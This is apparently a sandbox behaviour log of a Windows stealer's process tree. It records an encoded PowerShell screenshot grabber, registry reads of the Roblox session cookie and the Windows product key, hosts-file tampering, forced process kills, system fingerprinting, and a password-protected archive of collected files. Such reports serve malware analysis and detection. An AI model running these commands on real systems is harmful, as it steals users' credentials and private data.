                                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                              4⤵
                                                                                PID:5380
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                  5⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5868
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vr3utw3q\vr3utw3q.cmdline"
                                                                                    6⤵
                                                                                      PID:5924
                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1275.tmp" "c:\Users\Admin\AppData\Local\Temp\vr3utw3q\CSCA6379319513B4DF4A94ED79624B154D.TMP"
                                                                                        7⤵
                                                                                          PID:5208
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                    4⤵
                                                                                      PID:5784
                                                                                      • C:\Windows\system32\tree.com
                                                                                        tree /A /F
                                                                                        5⤵
                                                                                          PID:5912
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                        4⤵
                                                                                          PID:5264
                                                                                          • C:\Windows\system32\tree.com
                                                                                            tree /A /F
                                                                                            5⤵
                                                                                              PID:5544
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                            4⤵
                                                                                              PID:5432
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                5⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Views/modifies file attributes
                                                                                                PID:5540
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                              4⤵
                                                                                                PID:5480
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                  5⤵
                                                                                                  • Drops file in Drivers directory
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:5644
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                4⤵
                                                                                                  PID:5628
                                                                                                  • C:\Windows\system32\tree.com
                                                                                                    tree /A /F
                                                                                                    5⤵
                                                                                                      PID:5632
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                    4⤵
                                                                                                      PID:3376
                                                                                                      • C:\Windows\system32\tree.com
                                                                                                        tree /A /F
                                                                                                        5⤵
                                                                                                          PID:2392
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                        4⤵
                                                                                                          PID:5708
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            tasklist /FO LIST
                                                                                                            5⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:5368
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                          4⤵
                                                                                                            PID:5824
                                                                                                            • C:\Windows\system32\tree.com
                                                                                                              tree /A /F
                                                                                                              5⤵
                                                                                                                PID:5892
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4676"
                                                                                                              4⤵
                                                                                                                PID:2156
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  taskkill /F /PID 4676
                                                                                                                  5⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5560
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 928"
                                                                                                                4⤵
                                                                                                                  PID:5596
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /F /PID 928
                                                                                                                    5⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:5640
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1444"
                                                                                                                  4⤵
                                                                                                                    PID:5136
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /PID 1444
                                                                                                                      5⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5664
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2732"
                                                                                                                    4⤵
                                                                                                                      PID:5480
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /PID 2732
                                                                                                                        5⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:5904
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4676"
                                                                                                                      4⤵
                                                                                                                        PID:5816
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill /F /PID 4676
                                                                                                                          5⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:5364
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2480"
                                                                                                                        4⤵
                                                                                                                          PID:5852
                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                            taskkill /F /PID 2480
                                                                                                                            5⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:920
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 928"
                                                                                                                          4⤵
                                                                                                                            PID:3324
                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                              taskkill /F /PID 928
                                                                                                                              5⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:1728
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 400"
                                                                                                                            4⤵
                                                                                                                              PID:6008
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /F /PID 400
                                                                                                                                5⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5980
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1444"
                                                                                                                              4⤵
                                                                                                                                PID:1508
                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                  taskkill /F /PID 1444
                                                                                                                                  5⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:3128
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1356"
                                                                                                                                4⤵
                                                                                                                                  PID:5952
                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                    taskkill /F /PID 1356
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:5864
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2732"
                                                                                                                                  4⤵
                                                                                                                                    PID:5876
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /F /PID 2732
                                                                                                                                      5⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:5860
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2480"
                                                                                                                                    4⤵
                                                                                                                                      PID:5208
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 2480
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:5520
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                      4⤵
                                                                                                                                        PID:6120
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                          5⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:6064
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 400"
                                                                                                                                        4⤵
                                                                                                                                          PID:5200
                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                            taskkill /F /PID 400
                                                                                                                                            5⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:4776
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1356"
                                                                                                                                          4⤵
                                                                                                                                            PID:4800
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /F /PID 1356
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5696
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                            4⤵
                                                                                                                                              PID:5456
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2156
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                              4⤵
                                                                                                                                                PID:5128
                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                  getmac
                                                                                                                                                  5⤵
                                                                                                                                                    PID:1712
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29642\rar.exe a -r -hp"01302008" "C:\Users\Admin\AppData\Local\Temp\KGBVo.zip" *"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5628
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI29642\rar.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI29642\rar.exe a -r -hp"01302008" "C:\Users\Admin\AppData\Local\Temp\KGBVo.zip" *
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5632
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5368
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic os get Caption
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4692
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5724
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic computersystem get totalphysicalmemory
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5008
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5844
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1596
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3324
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:2532
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5984
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                      PID:5232
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6032
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:6024
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5184
                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                1⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:4768
                                                                                                                                                                • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                  C:\Windows\System32\MsiExec.exe -Embedding D4AD10367B6B91E27C1459AE21C1CF41
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  PID:1224
                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding DC59E8B4CD7843CA711E66A34AB71355
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  PID:3676
                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 711C808CA7D84549F5BE09F7A1911B19 E Global\MSI0000
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2828
                                                                                                                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                                    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3032
                                                                                                                                                                    • C:\Windows\System32\wevtutil.exe
